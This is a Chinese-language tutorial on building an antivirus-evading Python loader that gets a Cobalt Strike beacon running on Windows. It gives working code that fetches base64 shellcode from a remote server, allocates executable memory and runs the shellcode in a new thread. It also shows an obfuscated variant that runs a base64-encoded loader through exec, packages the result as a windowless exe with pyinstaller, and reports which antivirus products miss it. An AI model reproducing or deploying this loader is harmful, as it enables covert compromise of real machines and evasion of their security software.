本次实践参考小刚师傅的教程,详细原理请看原文:
https://mp.weixin.qq.com/
一、原理简述
??????????通过python requests 远程下载经过base64 编码后的shellcode 和loader ,然后解码通过exec函数先执行loader ,通过loader 加载shellcode ,最终达到CS上线目的。
二、环境配置
- python2.7
- pyinstaller 3.0.0
- win10
为了防止不同版本出现的幺蛾子,在此供上我的python安装包。 链接:https://pan.baidu.com/s/1ek3LYU8xqqjfQdqqt-dF8g 提取码:1v27
三、本地测试
1.生成shellcode
保留payload.c中的双引号部分内容,并将\x换为空,得到以fc开头的一串字符。之后将其base64编码放进服务器https://xxxxxxxx/1.txt 备用。
2.代码变形
加载器源码如下:
import ctypes
import requests
import base64
scode = requests.get ("https://xxxxxxxx/1.txt")
shellcode = bytearray (base64.b64decode (scode.text).decode ('hex'))
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc (ctypes.c_int (0),
ctypes.c_int (len (shellcode)),
ctypes.c_int (0x3000),
ctypes.c_int (0x40))
buf = (ctypes.c_char * len (shellcode)).from_buffer (shellcode)
ctypes.windll.kernel32.RtlMoveMemory (ctypes.c_int (ptr),
buf,
ctypes.c_int (len (shellcode)))
handle = ctypes.windll.kernel32.CreateThread (ctypes.c_int (0),
ctypes.c_int (0),
ctypes.c_uint64 (ptr),
ctypes.c_int (0),
ctypes.c_int (0),
ctypes.pointer (ctypes.c_int (0)))
ctypes.windll.kernel32.WaitForSingleObject (ctypes.c_int (handle), ctypes.c_int (-1))
变形后如下:
import ctypes
import requests
import base64
if __name__ == '__main__':
scode = '''fc4883e................'''
shellcode = bytearray (scode.decode('hex'))
loader = '''Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MucmVzdHlwZSA9IGN0eXBlcy5jX3VpbnQ2NDtwdHIgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYyhjdHlwZXMuY19pbnQoMCksY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKSxjdHlwZXMuY19pbnQoMHgzMDAwKSxjdHlwZXMuY19pbnQoMHg0MCkpO2J1ZiA9IChjdHlwZXMuY19jaGFyICogbGVuKHNoZWxsY29kZSkpLmZyb21fYnVmZmVyKHNoZWxsY29kZSk7Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX2ludChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKTtoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZChjdHlwZXMuY19pbnQoMCksY3R5cGVzLmNfaW50KDApLGN0eXBlcy5jX3VpbnQ2NChwdHIpLGN0eXBlcy5jX2ludCgwKSxjdHlwZXMuY19pbnQoMCksY3R5cGVzLnBvaW50ZXIoY3R5cGVzLmNfaW50KDApKSk7Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGUpLGN0eXBlcy5jX2ludCgtMSkp'''
exec (base64.b64decode(loader))
由于考虑到网络原因和python编码问题(request下载按照的是unicode编码,直接decode(‘hex’)要报错,可能和版本也有关系),可能有幺蛾子,所以就把shellcode和loader放在代码里了。
3.pyinstaller打包
需要事先装几个模块
python -m pip install requests
python -m pip install pyinstaller==3.0
python -m pip install pypiwin32
如果网速太慢的话就用国内的镜像,后面加几个命令,例如:
python -m pip install pypiwin32 -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com
之后打包:
pyinstaller -F local-anti.py -i Favicon.ico -w
关于pyinstaller 这几个打包的参数说明如下: 在dist目录下生成local-anti.exe ,运行成功上线:
4.免杀测试
360: 火绒: 微步沙箱: 看下来只有微软引擎报毒,看来还可以。
|